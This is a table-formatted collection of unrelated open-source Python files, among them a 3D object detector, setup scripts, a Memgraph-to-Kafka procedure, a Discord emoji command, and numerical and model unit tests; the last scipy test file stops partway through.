id | content
---|---
67088
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import numpy as np
from progress.bar import Bar
import time
import torch
from src.lib.external.nms import soft_nms
from src.lib.models.decode import ddd_decode
from src.lib.models.utils import flip_tensor
from src.lib.utils.image import get_affine_transform
from src.lib.utils.post_process import ddd_post_process
from src.lib.utils.debugger import Debugger
from src.lib.utils.ddd_utils import compute_box_3d, project_to_image, alpha2rot_y
from src.lib.utils.ddd_utils import draw_box_3d, unproject_2d_to_3d
from .base_detector import BaseDetector
class DddDetector(BaseDetector):
def __init__(self, opt):
super(DddDetector, self).__init__(opt)
self.calib = np.array([[707.0493, 0, 604.0814, 45.75831],
[0, 707.0493, 180.5066, -0.3454157],
[0, 0, 1., 0.004981016]], dtype=np.float32)
def pre_process(self, image, scale, calib=None):
height, width = image.shape[0:2]
inp_height, inp_width = self.opt.input_h, self.opt.input_w
c = np.array([width / 2, height / 2], dtype=np.float32)
if self.opt.keep_res:
s = np.array([inp_width, inp_height], dtype=np.int32)
else:
s = np.array([width, height], dtype=np.int32)
trans_input = get_affine_transform(c, s, 0, [inp_width, inp_height])
resized_image = image #cv2.resize(image, (width, height))
inp_image = cv2.warpAffine(
resized_image, trans_input, (inp_width, inp_height),
flags=cv2.INTER_LINEAR)
inp_image = (inp_image.astype(np.float32) / 255.)
inp_image = (inp_image - self.mean) / self.std
images = inp_image.transpose(2, 0, 1)[np.newaxis, ...]
calib = np.array(calib, dtype=np.float32) if calib is not None \
else self.calib
images = torch.from_numpy(images)
meta = {'c': c, 's': s,
'out_height': inp_height // self.opt.down_ratio,
'out_width': inp_width // self.opt.down_ratio,
'calib': calib}
return images, meta
def process(self, images, return_time=False):
with torch.no_grad():
torch.cuda.synchronize()
output = self.model(images)[-1]
output['hm'] = output['hm'].sigmoid_()
output['dep'] = 1. / (output['dep'].sigmoid() + 1e-6) - 1.
wh = output['wh'] if self.opt.reg_bbox else None
reg = output['reg'] if self.opt.reg_offset else None
torch.cuda.synchronize()
forward_time = time.time()
dets = ddd_decode(output['hm'], output['rot'], output['dep'],
output['dim'], wh=wh, reg=reg, K=self.opt.K)
if return_time:
return output, dets, forward_time
else:
return output, dets
def post_process(self, dets, meta, scale=1):
dets = dets.detach().cpu().numpy()
detections = ddd_post_process(
dets.copy(), [meta['c']], [meta['s']], [meta['calib']], self.opt)
self.this_calib = meta['calib']
return detections[0]
def merge_outputs(self, detections):
results = detections[0]
for j in range(1, self.num_classes + 1):
if len(results[j]) > 0:
keep_inds = (results[j][:, -1] > self.opt.peak_thresh)
results[j] = results[j][keep_inds]
return results
def debug(self, debugger, images, dets, output, scale=1):
dets = dets.detach().cpu().numpy()
img = images[0].detach().cpu().numpy().transpose(1, 2, 0)
img = ((img * self.std + self.mean) * 255).astype(np.uint8)
pred = debugger.gen_colormap(output['hm'][0].detach().cpu().numpy())
debugger.add_blend_img(img, pred, 'pred_hm')
debugger.add_ct_detection(
img, dets[0], show_box=self.opt.reg_bbox,
center_thresh=self.opt.vis_thresh, img_id='det_pred')
def show_results(self, debugger, image, results):
debugger.add_3d_detection(
image, results, self.this_calib,
center_thresh=self.opt.vis_thresh, img_id='add_pred')
debugger.add_bird_view(
results, center_thresh=self.opt.vis_thresh, img_id='bird_pred')
debugger.show_all_imgs(pause=self.pause)
|
67159
|
import unittest
from onnx import helper
from onnx import onnx_pb as onnx_proto
from onnxconverter_common.decast import decast
class DecastTestCase(unittest.TestCase):
def test_decast(self):
nodes = []
nodes[0:] = [helper.make_node('Identity', ['input1'], ['identity1'])]
nodes[1:] = [helper.make_node('Cast', ['identity1'], ['cast0'], to=1)]
nodes[2:] = [helper.make_node('ReduceSum', ['cast0'], ['reduce0'])]
nodes[3:] = [helper.make_node('Cast', ['reduce0'], ['cast1'], to=6)]
nodes[4:] = [helper.make_node('Identity', ['cast1'], ['output0'])]
input0 = helper.make_tensor_value_info('input1', onnx_proto.TensorProto.FLOAT, [1, 1, 2, 3])
output0 = helper.make_tensor_value_info('output0', onnx_proto.TensorProto.FLOAT, [1, 1, 2, 3])
graph = helper.make_graph(nodes, 'test_graph', [input0], [output0])
model = helper.make_model(graph)
self.assertIsNotNone(model)
converted_model = decast(model, ['ReduceSum'])
self.assertTrue(len(converted_model.graph.node) == 3)
if __name__ == '__main__':
unittest.main()
|
67162
|
from __future__ import print_function
import os
def log_check_call(command, stdin=None, env=None, shell=False, cwd=None):
status, stdout, stderr = log_call(command, stdin, env, shell, cwd)
from subprocess import CalledProcessError
if status != 0:
e = CalledProcessError(status, ' '.join(command), '\n'.join(stderr))
# Fix Pyro4's fixIronPythonExceptionForPickle() by setting the args property,
# even though we use our own serialization (at least I think that's the problem).
# See bootstrapvz.remote.serialize_called_process_error for more info.
setattr(e, 'args', (status, ' '.join(command), '\n'.join(stderr)))
raise e
return stdout
def log_call(command, stdin=None, env=None, shell=False, cwd=None):
import subprocess
import logging
from multiprocessing.dummy import Pool as ThreadPool
from os.path import realpath
command_log = realpath(command[0]).replace('/', '.')
log = logging.getLogger(__name__ + command_log)
if isinstance(command, list):
log.debug('Executing: {command}'.format(command=' '.join(command)))
else:
log.debug('Executing: {command}'.format(command=command))
process = subprocess.Popen(args=command, env=env, shell=shell, cwd=cwd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if stdin is not None:
log.debug(' stdin: ' + stdin)
process.stdin.write(stdin + "\n")
process.stdin.flush()
process.stdin.close()
stdout = []
stderr = []
def handle_stdout(line):
log.debug(line)
stdout.append(line)
def handle_stderr(line):
log.error(line)
stderr.append(line)
handlers = {process.stdout: handle_stdout,
process.stderr: handle_stderr}
def stream_readline(stream):
for line in iter(stream.readline, ''):
handlers[stream](line.strip())
pool = ThreadPool(2)
pool.map(stream_readline, [process.stdout, process.stderr])
pool.close()
pool.join()
process.wait()
return process.returncode, stdout, stderr
def sed_i(file_path, pattern, subst, expected_replacements=1):
replacement_count = inline_replace(file_path, pattern, subst)
if replacement_count != expected_replacements:
from .exceptions import UnexpectedNumMatchesError
msg = ('There were {real} instead of {expected} matches for '
'the expression `{exp}\' in the file `{path}\''
.format(real=replacement_count, expected=expected_replacements,
exp=pattern, path=file_path))
raise UnexpectedNumMatchesError(msg)
def inline_replace(file_path, pattern, subst):
import fileinput
import re
replacement_count = 0
for line in fileinput.input(files=file_path, inplace=True):
(replacement, count) = re.subn(pattern, subst, line)
replacement_count += count
print(replacement, end='')
return replacement_count
def load_json(path):
import json
from json_minify import json_minify
with open(path) as stream:
return json.loads(json_minify(stream.read(), False))
def load_yaml(path):
import yaml
with open(path, 'r') as stream:
return yaml.safe_load(stream)
def load_data(path):
filename, extension = os.path.splitext(path)
if not os.path.isfile(path):
raise Exception('The path {path} does not point to a file.'.format(path=path))
if extension == '.json':
return load_json(path)
elif extension == '.yml' or extension == '.yaml':
return load_yaml(path)
else:
raise Exception('Unrecognized extension: {ext}'.format(ext=extension))
def config_get(path, config_path):
config = load_data(path)
for key in config_path:
config = config.get(key)
return config
def copy_tree(from_path, to_path):
from shutil import copy
for abs_prefix, dirs, files in os.walk(from_path):
prefix = os.path.normpath(os.path.relpath(abs_prefix, from_path))
for path in dirs:
full_path = os.path.join(to_path, prefix, path)
if os.path.exists(full_path):
if os.path.isdir(full_path):
continue
else:
os.remove(full_path)
os.mkdir(full_path)
for path in files:
copy(os.path.join(abs_prefix, path),
os.path.join(to_path, prefix, path))
def rel_path(base, path):
return os.path.normpath(os.path.join(os.path.dirname(base), path))
|
67175
|
import csv
from corpus_util import add_word_continuation_tags
def get_tag_data_from_corpus_file(f):
"""Loads from file into four lists of lists of strings of equal length:
one for utterance iDs (IDs))
one for words (seq),
one for pos (pos_seq)
one for tags (targets)."""
f = open(f)
print "loading data", f.name
count_seq = 0
IDs = []
seq = []
pos_seq = []
targets = []
mappings = []
reader = csv.reader(f, delimiter='\t')
counter = 0
utt_reference = ""
currentWords = []
currentPOS = []
currentTags = []
currentMappings = []
# corpus = "" # can write to file
for ref, map, word, postag, disftag in reader: # mixture of POS and Words
counter += 1
if not ref == "":
if count_seq > 0: # do not reset the first time
# convert to the inc tags
# corpus+=utt_reference #write data to a file for checking
# convert to vectors
seq.append(tuple(currentWords))
pos_seq.append(tuple(currentPOS))
targets.append(tuple(add_word_continuation_tags(currentTags)))
IDs.append(utt_reference)
mappings.append(tuple(currentMappings))
# reset the words
currentWords = []
currentPOS = []
currentTags = []
currentMappings = []
# set the utterance reference
count_seq += 1
utt_reference = ref
currentWords.append(word)
currentPOS.append(postag)
currentTags.append(disftag)
currentMappings.append(map)
# flush
if not currentWords == []:
seq.append(tuple(currentWords))
pos_seq.append(tuple(currentPOS))
targets.append(tuple(add_word_continuation_tags(currentTags)))
IDs.append(utt_reference)
mappings.append(tuple(currentMappings))
assert len(seq) == len(targets) == len(pos_seq)
print "loaded " + str(len(seq)) + " sequences"
f.close()
return (IDs, mappings, seq, pos_seq, targets)
def sort_into_dialogue_speakers(IDs, mappings, utts, pos_tags=None,
labels=None):
"""For each utterance, given its ID get its conversation number and
dialogue participant in the format needed for word alignment files.
Returns a list of tuples:
(speaker, mappings, utts, pos, labels)
"""
dialogue_speaker_dict = dict() # keys are speaker IDs of filename:speaker
# vals are tuples of (mappings, utts, pos_tags, labels)
current_speaker = ""
for ID, mapping, utt, pos, label in zip(IDs,
mappings,
utts,
pos_tags,
labels):
split = ID.split(":")
dialogue = split[0]
speaker = split[1]
# uttID = split[2]
current_speaker = "-".join([dialogue, speaker])
if current_speaker not in dialogue_speaker_dict.keys():
dialogue_speaker_dict[current_speaker] = [[], [], [], []]
dialogue_speaker_dict[current_speaker][0].extend(list(mapping))
dialogue_speaker_dict[current_speaker][1].extend(list(utt))
dialogue_speaker_dict[current_speaker][2].extend(list(pos))
dialogue_speaker_dict[current_speaker][3].extend(list(label))
# turn into 5-tuples
dialogue_speakers = [(key,
dialogue_speaker_dict[key][0],
dialogue_speaker_dict[key][1],
dialogue_speaker_dict[key][2],
dialogue_speaker_dict[key][3])
for key in sorted(dialogue_speaker_dict.keys())]
return dialogue_speakers
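# A minimal sketch with hypothetical data, illustrating the utterance-ID convention
# that sort_into_dialogue_speakers() above assumes: IDs look like
# "<dialogue>:<speaker>:<utterance-number>", and rows are regrouped under a
# "<dialogue>-<speaker>" key.
_example_IDs = ["4617:A:1", "4617:A:2", "4617:B:1"]
_example_words = [("uh", "hello"), ("yes",), ("hi", "there")]
_speakers = {}
for _ID, _words in zip(_example_IDs, _example_words):
    _dialogue, _speaker = _ID.split(":")[0], _ID.split(":")[1]
    _key = "-".join([_dialogue, _speaker])
    _speakers.setdefault(_key, []).extend(_words)
# _speakers == {"4617-A": ["uh", "hello", "yes"], "4617-B": ["hi", "there"]}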
def write_corpus_file_add_fake_timings_and_utt_tags(f, target_path,
verbose=False):
target_file = open(target_path, "w")
IDs, mappings, utts, pos_tags, labels = get_tag_data_from_corpus_file(f)
dialogue_speakers = sort_into_dialogue_speakers(IDs,
mappings,
utts,
pos_tags,
labels)
for speaker_name, mapping, utt, pos, label in dialogue_speakers:
if verbose:
print "*" * 30
print speaker_name
print mapping
print utt
print pos
print label
y = raw_input()
if y == "y":
quit()
target_file.write("Speaker: " + speaker_name + "\n")
starts = range(0, len(label))
ends = range(1, len(label)+1)
for m, s, e, w, p, l in zip(mapping, starts, ends, utt, pos, label):
l = "\t".join([m, str(float(s)), str(float(e)), w, p, l])
target_file.write(l + "\n")
target_file.write("\n")
target_file.close()
if __name__ == "__main__":
#f = "../../../stir/python/data/bnc_spoken/BNC-CH_partial_data.csv"
#write_corpus_file_add_fake_timings_and_utt_tags(
# f, f.replace("_data", "_data_timings"))
f = "../../../stir/python/data/pcc/PCC_test_partial_data.csv"
write_corpus_file_add_fake_timings_and_utt_tags(
f, f.replace("_data", "_data_timings"))
if False:
f = "../../../stir/python/data/pcc/PCC_test_partial_data_old.csv"
target = open(f.replace("_data_old", "_data"), "w")
f = open(f)
reader = csv.reader(f, delimiter='\t')
for ref, map, word, postag, disftag in reader: # mixture of POS and Words
if not ref == "":
spl = ref.split(":")
n_ref = ":".join([spl[0], spl[2], spl[1]])
target.write("\t".join([n_ref, map, word, postag, disftag]) + "\n")
else:
target.write("\t".join([ref, map, word, postag, disftag]) + "\n")
target.close()
|
67179
|
from itertools import product
import torch
from dgmc.models import GIN
def test_gin():
model = GIN(16, 32, num_layers=2, batch_norm=True, cat=True, lin=True)
assert model.__repr__() == ('GIN(16, 32, num_layers=2, batch_norm=True, '
'cat=True, lin=True)')
x = torch.randn(100, 16)
edge_index = torch.randint(100, (2, 400), dtype=torch.long)
for cat, lin in product([False, True], [False, True]):
model = GIN(16, 32, 2, True, cat, lin)
out = model(x, edge_index)
assert out.size() == (100, 16 + 2 * 32 if not lin and cat else 32)
assert out.size() == (100, model.out_channels)
|
67226
|
import json
import mgp
import os
from kafka import KafkaProducer
KAFKA_IP = os.getenv('KAFKA_IP', 'kafka')
KAFKA_PORT = os.getenv('KAFKA_PORT', '9092')
@mgp.read_proc
def create(created_objects: mgp.Any
) -> mgp.Record():
created_objects_info = {'vertices': [], 'edges': []}
for obj in created_objects:
if obj['event_type'] == 'created_vertex':
created_object = {
'id': obj['vertex'].id,
'labels': [label.name for label in obj['vertex'].labels],
}
if obj['vertex'].labels[0].name == "SUBMISSION":
created_object.update({
'sentiment': obj['vertex'].properties['sentiment'],
'title': obj['vertex'].properties['title'],
})
elif obj['vertex'].labels[0].name == "COMMENT":
created_object.update({
'sentiment': obj['vertex'].properties['sentiment'],
'body': obj['vertex'].properties['body'],
})
else:
created_object.update({
'name': obj['vertex'].properties['name'],
})
created_objects_info['vertices'].append(created_object)
else:
created_objects_info['edges'].append({
'id': obj['edge'].id,
'type': obj['edge'].type.name,
'from': obj['edge'].from_vertex.id,
'to': obj['edge'].to_vertex.id
})
kafka_producer = KafkaProducer(bootstrap_servers=KAFKA_IP + ':' + KAFKA_PORT)
kafka_producer.send('created_objects', json.dumps(
created_objects_info).encode('utf8'))
return None
|
67257
|
from spaceone.core.service.utils import *
from spaceone.core.service.service import *
__all__ = ['BaseService', 'transaction', 'authentication_handler', 'authorization_handler', 'mutation_handler',
'event_handler', 'check_required', 'append_query_filter', 'change_tag_filter', 'change_timestamp_value',
'change_timestamp_filter', 'change_date_value', 'append_keyword_filter', 'change_only_key']
|
67282
|
import fnmatch
import os
import platform
import subprocess
import sys
import logging
from distutils.version import LooseVersion
from setuptools import setup, Extension
log = logging.getLogger(__name__)
ch = logging.StreamHandler()
log.addHandler(ch)
MIN_GEOS_VERSION = "3.5"
if "all" in sys.warnoptions:
# show GEOS messages in console with: python -W all
log.setLevel(logging.DEBUG)
def get_geos_config(option):
"""Get configuration option from the `geos-config` development utility
The PATH environment variable should include the path where geos-config is located.
"""
try:
stdout, stderr = subprocess.Popen(
["geos-config", option], stdout=subprocess.PIPE, stderr=subprocess.PIPE
).communicate()
except OSError:
return
if stderr and not stdout:
log.warning("geos-config %s returned '%s'", option, stderr.decode().strip())
return
result = stdout.decode().strip()
log.debug("geos-config %s returned '%s'", option, result)
return result
def get_geos_paths():
"""Obtain the paths for compiling and linking with the GEOS C-API
First the presence of the GEOS_INCLUDE_PATH and GEOS_LIBRARY_PATH environment
variables is checked. If they are both present, these are taken.
If one of the two paths was not present, geos-config is called (it should be on the
PATH variable). geos-config provides all the paths.
If geos-config was not found, no additional paths are provided to the extension. It is
still possible to compile in this case using custom arguments to setup.py.
"""
include_dir = os.environ.get("GEOS_INCLUDE_PATH")
library_dir = os.environ.get("GEOS_LIBRARY_PATH")
if include_dir and library_dir:
return {
"include_dirs": [include_dir],
"library_dirs": [library_dir],
"libraries": ["geos_c"],
}
geos_version = get_geos_config("--version")
if not geos_version:
log.warning(
"Could not find geos-config executable. Either append the path to geos-config"
" to PATH or manually provide the include_dirs, library_dirs, libraries and "
"other link args for compiling against a GEOS version >=%s.",
MIN_GEOS_VERSION,
)
return {}
if LooseVersion(geos_version) < LooseVersion(MIN_GEOS_VERSION):
raise ImportError(
"GEOS version should be >={}, found {}".format(
MIN_GEOS_VERSION, geos_version
)
)
libraries = []
library_dirs = []
include_dirs = []
extra_link_args = []
for item in get_geos_config("--cflags").split():
if item.startswith("-I"):
include_dirs.extend(item[2:].split(":"))
for item in get_geos_config("--clibs").split():
if item.startswith("-L"):
library_dirs.extend(item[2:].split(":"))
elif item.startswith("-l"):
libraries.append(item[2:])
else:
extra_link_args.append(item)
return {
"include_dirs": include_dirs,
"library_dirs": library_dirs,
"libraries": libraries,
"extra_link_args": extra_link_args,
}
class PyBind11Include:
def __str__(self):
import pybind11
return pybind11.get_include()
geos_paths = get_geos_paths()
sources = ['pymeos/source/pybind.cpp']
for root, dirnames, filenames in os.walk('./source'):
for filename in fnmatch.filter(filenames, '*.cpp'):
sources.append(os.path.join(root, filename))
include_dirs = ['include', 'pymeos/include', PyBind11Include()] + geos_paths.get("include_dirs", [])
library_dirs = geos_paths.get("library_dirs", [])
libraries = geos_paths.get("libraries", [])
extra_compile_args = []
if platform.system() == "Windows":
extra_compile_args.append('/std:c++14')
else:
extra_compile_args.append('-std=c++14')
extra_compile_args.append('-g0')
extra_link_args = geos_paths.get("extra_link_args", [])
setup(
ext_modules=[
Extension(
'_pymeos',
sources,
include_dirs=include_dirs,
library_dirs=library_dirs,
libraries=libraries,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args,
language='c++',
),
],
)
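# A hypothetical usage sketch (the install paths below are assumptions, not part of
# this project): setting GEOS_INCLUDE_PATH / GEOS_LIBRARY_PATH makes get_geos_paths()
# return them directly and skip the geos-config lookup described in its docstring.
#
#   GEOS_INCLUDE_PATH=/opt/geos/include \
#   GEOS_LIBRARY_PATH=/opt/geos/lib \
#   python setup.py build_ext --inplace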
|
67302
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="coderunner",
version="1.0",
license="MIT",
author="<NAME>",
author_email="<EMAIL>",
description="A judge for your programs, run and test your programs using python",
keywords="judge0 coderunner judge0api codeclassroom",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://codeclassroom.github.io/CodeRunner/",
project_urls={
"Documentation": "https://coderunner.readthedocs.io/en/latest/",
"Source Code": "https://github.com/codeclassroom/CodeRunner",
"Funding": "https://www.patreon.com/bePatron?u=18082750",
"Say Thanks!": "https://github.com/codeclassroom/CodeRunner/issues/new?assignees=&labels=&template=---say-thank-you.md&title=",
"Tracker": "https://github.com/codeclassroom/CodeRunner/issues",
},
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3 :: Only",
"License :: OSI Approved :: MIT License",
"Topic :: Education",
"Topic :: Education",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
"Operating System :: OS Independent",
],
python_requires=">=3.6",
)
|
67303
|
from objects.modulebase import ModuleBase
from objects.permissions import PermissionEmbedLinks, PermissionAttachFiles
from io import BytesIO
from discord import Embed, Colour, File
from constants import ID_REGEX, EMOJI_REGEX
EMOJI_ENDPOINT = 'https://cdn.discordapp.com/emojis/{}'
TWEMOJI_ENDPOINT = 'https://bot.mods.nyc/twemoji/{}.png'
class Module(ModuleBase):
usage_doc = '{prefix}{aliases} <emoji>'
short_doc = 'Get emoji image'
name = 'emoji'
aliases = (name, 'e')
category = 'Discord'
min_args = 1
max_args = 1
bot_perms = (PermissionEmbedLinks(), PermissionAttachFiles())
async def on_call(self, ctx, args, **flags):
e = Embed(colour=Colour.gold())
f = None
text = args[1:]
emoji_id = None
emoji_name = ''
id_match = ID_REGEX.fullmatch(text)
if id_match:
emoji_id = int(id_match.group(0))
else:
emoji_match = EMOJI_REGEX.fullmatch(text)
if emoji_match:
groups = emoji_match.groupdict()
emoji_id = int(groups['id'])
emoji_name = groups['name']
if emoji_id is None:
# thanks discord for this nonsense
text = text.rstrip("\N{VARIATION SELECTOR-16}")
code = '-'.join(map(lambda c: f'{ord(c):x}', text))
async with self.bot.sess.get(TWEMOJI_ENDPOINT.format(code)) as r:
if r.status != 200:
return await ctx.warn('Could not get emoji from input text')
filename = 'emoji.png'
f = File(BytesIO(await r.read()), filename=filename)
e.title = 'TWEmoji'
e.set_image(url=f'attachment://{filename}')
else:
e.set_footer(text=emoji_id)
emoji = self.bot.get_emoji(emoji_id)
if emoji is None:
async with self.bot.sess.get(EMOJI_ENDPOINT.format(emoji_id)) as r:
if r.status != 200:
return await ctx.error('Emoji with given id not found')
filename = f'emoji.{r.content_type[6:]}'
f = File(BytesIO(await r.read()), filename=filename)
e.title = f'Emoji {emoji_name or ""}'
e.set_image(url=f'attachment://{filename}')
else:
e.title = f'Emoji {emoji.name}'
e.set_image(url=emoji.url)
await ctx.send(embed=e, file=f)
|
67311
|
import os
import random
import itertools
vector_template = '''static uint64_t {}[{}] =
{{
{}
}};
'''
max_u64 = 0xffffffffffffffff
max_u64_str = str(hex(max_u64))
def get_random_u64 (size):
return '0x' + (os.urandom(size).hex() if size != 0 else '0')
def print_vectors (name, l):
return vector_template.format(name, str(len(l)), ',\n '.join(l))
def main():
edge_cases = itertools.product(
['0x0', max_u64_str], ['0x0', max_u64_str], ['0x0', '0x1'])
# (size of a, size of b, number of vectors to generate)
configs = [(0,1,10), (1,1,10), (2,2,10), (2,3,10), (3,4,10), (4,4,10),
(5,4,10), (4,5,10), (6,6,10), (7,7,10), (8,8,20)]
a_vectors = []
b_vectors = []
cin_vectors = []
addcarry_res_vectors = []
addcarry_cout_vectors = []
subborrow_res_vectors = []
subborrow_cout_vectors = []
def compute_vector(a, b, cin):
a_vectors.append(a)
b_vectors.append(b)
cin_vectors.append(cin)
addition = int(a, 16) + int(b, 16) + int(cin, 16)
cout = addition // (max_u64 + 1)
res = addition % (max_u64 + 1)
res = max_u64 if res < 0 else res
addcarry_res_vectors.append(hex(res))
addcarry_cout_vectors.append(hex(cout))
subtraction = int(a, 16) - int(b, 16) - int(cin, 16)
if subtraction >= 0:
res = subtraction
cout = 0
else:
res = max_u64 + subtraction + 1
cout = 1
subborrow_res_vectors.append(hex(res))
subborrow_cout_vectors.append(hex(cout))
for c in edge_cases:
compute_vector(*c)
for c in configs:
for i in range(c[2]):
a = get_random_u64(c[0])
b = get_random_u64(c[1])
cin = '0x' + str(random.randint(0,1))
compute_vector(a, b, cin)
with open('uint128-intrinsics_vectors.h', 'w') as f:
f.write('static uint32_t num_vectors = {};\n\n'.format(len(a_vectors)))
f.write(print_vectors('a_vectors', a_vectors))
f.write(print_vectors('b_vectors', b_vectors))
f.write(print_vectors('cin_vectors', cin_vectors))
f.write(print_vectors('addcarry_res_vectors', addcarry_res_vectors))
f.write(print_vectors('addcarry_cout_vectors', addcarry_cout_vectors))
f.write(print_vectors('subborrow_res_vectors', subborrow_res_vectors))
f.write(print_vectors('subborrow_cout_vectors', subborrow_cout_vectors))
main ()
|
67333
|
import tensorflow as tf
from neupy import layers
from neupy.utils import tf_utils, as_tuple
from neupy.layers.base import BaseGraph
__all__ = ('mixture_of_experts',)
def check_if_network_is_valid(network, index):
if not isinstance(network, BaseGraph):
raise TypeError(
"Invalid input, Mixture of experts expects networks/layers"
"in the list of networks, got `{}` instance instead"
"".format(type(network)))
if len(network.input_layers) > 1:
raise ValueError(
"Each network from the mixture of experts has to process single "
"input tensor. Network #{} (0-based indices) has more than one "
"input layer. Input layers: {}"
"".format(index, network.output_layers))
if len(network.output_layers) > 1:
raise ValueError(
"Each network from the mixture of experts has to output single "
"tensor. Network #{} (0-based indices) has more than one output "
"layer. Output layers: {}".format(index, network.output_layers))
if network.input_shape.ndims != 2:
raise ValueError(
"Each network from the mixture of experts has to process "
"only 2-dimensional inputs. Network #{} (0-based indices) "
"processes only {}-dimensional inputs. Input layer's shape: {}"
"".format(index, network.input_shape.ndims, network.input_shape))
def check_if_networks_compatible(networks):
input_shapes = []
output_shapes = []
for i, network in enumerate(networks):
input_shapes.append(network.input_shape)
output_shapes.append(network.output_shape)
for shape in input_shapes:
if not shape.is_compatible_with(input_shapes[0]):
raise ValueError(
"Networks have incompatible input shapes. Shapes: {}"
"".format(tf_utils.shape_to_tuple(input_shapes)))
for shape in output_shapes:
if not shape.is_compatible_with(output_shapes[0]):
raise ValueError(
"Networks have incompatible output shapes. Shapes: {}"
"".format(tf_utils.shape_to_tuple(output_shapes)))
def mixture_of_experts(networks, gating_layer=None):
"""
Generates mixture of experts architecture from the set of
networks that has the same input and output shapes.
Mixture of experts learns how to mix results from different
networks in order to get better performance. It adds a gating layer
that uses the input data to figure out which of the networks
will make a better contribution to the final result. The final result
is a weighted mixture of the outputs of all networks; the higher the
weight, the larger the contribution from the individual network.
Parameters
----------
networks : list of networks/layers
gating_layer : None or layer
If `None`, the following layer will be created:
.. code-block:: python
gating_layer = layers.Softmax(len(networks))
Output from the gating layer should be 1D, with size equal
to the number of networks.
Raises
------
ValueError
If there is a problem with the input networks
or the custom gating layer.
Returns
-------
network
Mixture of experts network that combines all networks into
a single one and adds a gating layer to it.
Examples
--------
>>> from neupy import algorithms, architectures
>>> from neupy.layers import *
>>>
>>> network = architectures.mixture_of_experts([
... join(
... Input(10),
... Relu(5),
... ),
... join(
... Input(10),
... Relu(33),
... Relu(5),
... ),
... join(
... Input(10),
... Relu(12),
... Relu(25),
... Relu(5),
... ),
... ])
>>> network
(?, 10) -> [... 12 layers ...] -> (?, 5)
>>>
>>> optimizer = algorithms.Momentum(network, step=0.1)
"""
if not isinstance(networks, (list, tuple)):
raise ValueError("Networks should be specified as a list")
for index, network in enumerate(networks):
check_if_network_is_valid(network, index)
check_if_networks_compatible(networks)
input_shape = tf.TensorShape(None)
for network in networks:
input_shape = input_shape.merge_with(network.input_shape)
n_layers_to_combine = len(networks)
n_features = input_shape[1].value
if n_features is None:
raise ValueError(
"Cannot create mixture of experts model, because "
"number of input features is unknown")
if gating_layer is None:
gating_layer = layers.Softmax(n_layers_to_combine)
if not isinstance(gating_layer, layers.BaseLayer):
raise ValueError(
"Invalid type for gating layer. Type: {}"
"".format(type(gating_layer)))
return layers.join(
layers.Input(n_features),
# Note: Gating network should be specified
# as a first parameter.
layers.parallel(*as_tuple(gating_layer, networks)),
layers.GatedAverage(),
)
|
67356
|
import numpy as np
from numpy.linalg import lstsq
from numpy.testing import (assert_allclose, assert_equal, assert_,
run_module_suite, assert_raises)
from scipy.sparse import rand
from scipy.sparse.linalg import aslinearoperator
from scipy.optimize import lsq_linear
A = np.array([
[0.171, -0.057],
[-0.049, -0.248],
[-0.166, 0.054],
])
b = np.array([0.074, 1.014, -0.383])
class BaseMixin(object):
def __init__(self):
self.rnd = np.random.RandomState(0)
def test_dense_no_bounds(self):
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, method=self.method, lsq_solver=lsq_solver)
assert_allclose(res.x, lstsq(A, b)[0])
def test_dense_bounds(self):
# Solutions for comparison are taken from MATLAB.
lb = np.array([-1, -10])
ub = np.array([1, 0])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, lstsq(A, b)[0])
lb = np.array([0.0, -np.inf])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, np.inf), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([0.0, -4.084174437334673]),
atol=1e-6)
lb = np.array([-1, 0])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, np.inf), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([0.448427311733504, 0]),
atol=1e-15)
ub = np.array([np.inf, -5])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (-np.inf, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([-0.105560998682388, -5]))
ub = np.array([-1, np.inf])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (-np.inf, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([-1, -4.181102129483254]))
lb = np.array([0, -4])
ub = np.array([1, 0])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([0.005236663400791, -4]))
def test_dense_rank_deficient(self):
A = np.array([[-0.307, -0.184]])
b = np.array([0.773])
lb = [-0.1, -0.1]
ub = [0.1, 0.1]
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, [-0.1, -0.1])
A = np.array([
[0.334, 0.668],
[-0.516, -1.032],
[0.192, 0.384],
])
b = np.array([-1.436, 0.135, 0.909])
lb = [0, -1]
ub = [1, -0.5]
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.optimality, 0, atol=1e-11)
def test_full_result(self):
lb = np.array([0, -4])
ub = np.array([1, 0])
res = lsq_linear(A, b, (lb, ub), method=self.method)
assert_allclose(res.x, [0.005236663400791, -4])
r = A.dot(res.x) - b
assert_allclose(res.cost, 0.5 * np.dot(r, r))
assert_allclose(res.fun, r)
assert_allclose(res.optimality, 0.0, atol=1e-12)
assert_equal(res.active_mask, [0, -1])
assert_(res.nit < 15)
assert_(res.status == 1 or res.status == 3)
assert_(isinstance(res.message, str))
assert_(res.success)
class SparseMixin(object):
def test_sparse_and_LinearOperator(self):
m = 5000
n = 1000
A = rand(m, n, random_state=0)
b = self.rnd.randn(m)
res = lsq_linear(A, b)
